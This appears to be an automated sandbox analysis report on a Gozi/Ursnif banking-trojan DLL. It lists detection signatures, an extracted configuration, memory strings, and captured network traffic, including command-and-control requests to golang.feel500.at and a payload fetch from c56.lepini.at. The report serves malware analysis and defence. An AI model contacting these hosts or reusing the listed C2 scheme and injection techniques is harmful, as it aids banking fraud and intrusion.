Analysis Report u.dll

Overview

General Information

Sample Name: u.dll
Analysis ID: 340570
MD5: 27b993fac30602ea1db166a101e953cd
SHA1: 2054819f55d10f3f241ffa27fa7996a0edeb8722
SHA256: 61774f16549fb39d6d28ea208634bb106294bb2e31e6847d804f74a08a4bc0e2
Tags: api1ursnif

Most interesting Screenshot:

Detection

Gozi Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Gozi e-Banking trojan
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

barindex
Found malware configuration
Source: loaddll32.exe.5388.0.memstr Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_0_x64", "version": "250171", "uptime": "167", "system": "534e14562e5454b7ff528954966ab0fbhh", "size": "201284", "crc": "2", "action": "00000000", "id": "1100", "time": "1610850252", "user": "f73be0088695dc15e71ab15c3e220863", "hash": "0x9e9e912e", "soft": "3"}
Multi AV Scanner detection for submitted file
Source: u.dll Metadefender: Detection: 37% Perma Link
Source: u.dll ReversingLabs: Detection: 62%
Machine Learning detection for sample
Source: u.dll Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.loaddll32.exe.810000.1.unpack Avira: Label: TR/Crypt.XPACK.Gen8
Source: 0.2.loaddll32.exe.10000000.3.unpack Avira: Label: TR/Crypt.XPACK.Gen8

Compliance:

barindex
Uses 32bit PE files
Source: u.dll Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001D.00000002.403057953.0000022AC2C50000.00000002.00000001.sdmp, csc.exe, 00000020.00000002.409373229.00000285A6DD0000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000023.00000000.429222350.0000000006300000.00000002.00000001.sdmp
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.427507513.0000000003F50000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.427507513.0000000003F50000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: control.exe, 00000026.00000002.443790025.0000016755F5C000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 00000026.00000002.443790025.0000016755F5C000.00000004.00000040.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000023.00000000.429222350.0000000006300000.00000002.00000001.sdmp
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0076E0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 0_2_0076E0BA
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0077888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 0_2_0077888D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00784FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 0_2_00784FE1
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007705EF wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 0_2_007705EF

Networking:

barindex
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic HTTP traffic detected: GET /api1/uwAgMP_2FLcVGWT97wRz/iFuHzBrE_2BSOdMeVCC/MCeuWpe0oeS60koRr7ouEQ/mA6VPayDQaLka/FRRumVTO/R6jyPxG53t8jXNaUuut9HZp/_2FeFn_2Bv/FxzrB85qzirN1_2Br/h9aBdGM8_2F8/izm7K9qYo3p/coPYeEK7OXBvB1/3rTZ1KEHgQsipis_2BsU6/JxYhGHE4BQ9PqivC/FDEoEqqIA8TiNnR/W2sxdloLwBiD447Ckp/zU8QnBlT0/RAx4pi_2FFnJRoMwbcHr/E0Q28GjxYmwU0s8C_2F/RdJV3E8NjousASoWzP2B0B/b7Fopjfk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: golang.feel500.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/4Mp9Bb14Sy5p7GvBrQ/e6g_2FX3A/zzGuh2QtxluYpZlF_2Fz/TQxCK8s7Y1j2YlE561k/l3Tu3oNGiBi_2B1LxXl9ix/tdkHWE3zb3013/NCe8_2FS/Znb2CJqJMCRGryN4PSOzj75/v9CbgnKlGO/etpX9GZzX383qc3kj/4QMA7zJBU1Ic/EzGhR_2FzoP/3_2B6WVpUtzuV3/qdJHK_2F2IGepdTevlhm8/rNr4OwxdD34091kc/dNsLbz7JZDdgUXq/IuIRIkxRhwde9K6HME/67IWHOJgs/jyVSKVmBH_2Fm_2FvWwu/O341hvVg_2FQb_2B3aR/QcUJcqb4Pt1RjuiXC_2Bm5/xsdXvU7m HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: golang.feel500.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: golang.feel500.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/Rce8jxmWhK3ih3/wsPjkBW2_2B3FZFW1K47u/qNMQVVcyjBkgqGo4/EV9w4LVtwT4dZ22/OvqSLxhTQ3_2FvabW_/2FgZB0ja6/5x9Za3_2FQN4ZdUGH6lo/suw50whDv5PhfbDIdeX/T8eQmCtvYhggs3SS3gjEZp/M9FvWod65aEU9/G6avRfSM/LfZoGD4M2GwS3WWXnDZAQsS/VIiOqdfsU1/pU1_2B6cKaXhAnsco/82IM1VR4P9YJ/_2BGT5YwaNg/KNwzb_2F0dky5V/sFXJntfI7YvzRXn9ooIqO/8cWsv_2FMjFm7Qz8/GqjkN8IiVtb8odv/cswSX5yoUMDZAw42Dq/yWZp HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: golang.feel500.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: golang.feel500.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/NeO9GC4_2Bl/x9HARNfj64n5WB/hrPVKQtB3b_2BA3jyOiQn/kGNVZhEDZsaw0LxU/Dpv9nLyrcxEtZtJ/aFk5WP8GrjDU6G2qhU/pfczd6wQ0/VQNjrLUxUcw28TdaAijZ/89nWrTX52c7_2FR0UrN/cXuYEo71O4zWb5pZgnZUnE/a4LShAF2E9csS/CV2_2FBR/zc7igOEVQPQIDcjgOx7vNeT/w89tSFUR_2/B8TFVzEvMI9Q1_2Fs/VFFyBcB1hsce/wRFgoZFfP6P/IBtRYE5NliJiT7/EKsY85FO4bqdIDJLInDKV/tHpq5V_2FqaGA1EL/anvzDbUyWBHQ440/SYAUKxVK/j HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: golang.feel500.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: msapplication.xml0.5.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xcf6dcc9a,0x01d6ec77</date><accdate>0xcf6dcc9a,0x01d6ec77</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.5.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xcf6dcc9a,0x01d6ec77</date><accdate>0xcf6dcc9a,0x01d6ec77</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.5.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xcf702eec,0x01d6ec77</date><accdate>0xcf702eec,0x01d6ec77</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.5.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xcf702eec,0x01d6ec77</date><accdate>0xcf702eec,0x01d6ec77</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.5.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xcf72914d,0x01d6ec77</date><accdate>0xcf72914d,0x01d6ec77</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.5.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xcf72914d,0x01d6ec77</date><accdate>0xcf72914d,0x01d6ec77</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: golang.feel500.at
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 16 Jan 2021 17:23:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: explorer.exe, 00000023.00000000.428677337.0000000006100000.00000002.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000023.00000000.428677337.0000000006100000.00000002.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: loaddll32.exe, powershell.exe, 0000001B.00000003.415711591.000001FE6ECE0000.00000004.00000001.sdmp, explorer.exe, 00000023.00000003.439971229.00000000032B0000.00000004.00000001.sdmp, control.exe, 00000026.00000003.430559712.0000016753ED0000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000002.441197117.0000000000760000.00000040.00000001.sdmp, powershell.exe, 0000001B.00000003.415711591.000001FE6ECE0000.00000004.00000001.sdmp, explorer.exe, 00000023.00000003.439971229.00000000032B0000.00000004.00000001.sdmp, control.exe, 00000026.00000003.430559712.0000016753ED0000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000023.00000000.435411741.000000000F540000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000023.00000000.435486127.000000000F599000.00000004.00000001.sdmp String found in binary or memory: http://crl.microsof
Source: u.dll String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: u.dll String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000023.00000000.433900760.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: {13BBE1FF-586B-11EB-90E4-ECF4BB862DED}.dat.21.dr, ~DFF242F5BB1698763D.TMP.21.dr String found in binary or memory: http://golang.feel500.at/api1/4Mp9Bb14Sy5p7GvBrQ/e6g_2FX3A/zzGuh2QtxluYpZlF_2Fz/TQxCK8s7Y1j2YlE561k/
Source: RuntimeBroker.exe, 00000027.00000000.441895717.000001FC11790000.00000002.00000001.sdmp String found in binary or memory: http://golang.feel500.at/api1/NeO9GC4_2Bl/x9HARNfj64n5WB/hrPVKQtB3b_2BA3jyOiQn/kGNVZhEDZsaw0LxU
Source: {13BBE203-586B-11EB-90E4-ECF4BB862DED}.dat.21.dr String found in binary or memory: http://golang.feel500.at/api1/NeO9GC4_2Bl/x9HARNfj64n5WB/hrPVKQtB3b_2BA3jyOiQn/kGNVZhEDZsaw0LxU/Dpv9
Source: {13BBE201-586B-11EB-90E4-ECF4BB862DED}.dat.21.dr, ~DFC4A6EAD0B1D57EF4.TMP.21.dr String found in binary or memory: http://golang.feel500.at/api1/Rce8jxmWhK3ih3/wsPjkBW2_2B3FZFW1K47u/qNMQVVcyjBkgqGo4/EV9w4LVtwT4dZ22/
Source: {F8107B90-586A-11EB-90E4-ECF4BB862DED}.dat.5.dr String found in binary or memory: http://golang.feel500.at/api1/uwAgMP_2FLcVGWT97wRz/iFuHzBrE_2BSOdMeVCC/MCeuWpe0oeS60koRr7ouEQ/mA6VPa
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: loaddll32.exe, 00000000.00000002.441197117.0000000000760000.00000040.00000001.sdmp, loaddll32.exe, 00000000.00000003.424976017.00000000007A0000.00000004.00000001.sdmp, powershell.exe, 0000001B.00000003.415711591.000001FE6ECE0000.00000004.00000001.sdmp, explorer.exe, 00000023.00000003.439971229.00000000032B0000.00000004.00000001.sdmp, control.exe, 00000026.00000003.430559712.0000016753ED0000.00000004.00000001.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: u.dll String found in binary or memory: http://ocsp.sectigo.com0
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: powershell.exe, 0000001B.00000002.1017567329.000001FE0020F000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://sads.myspace.com/
Source: powershell.exe, 0000001B.00000002.1017368359.000001FE00001000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.about.com/
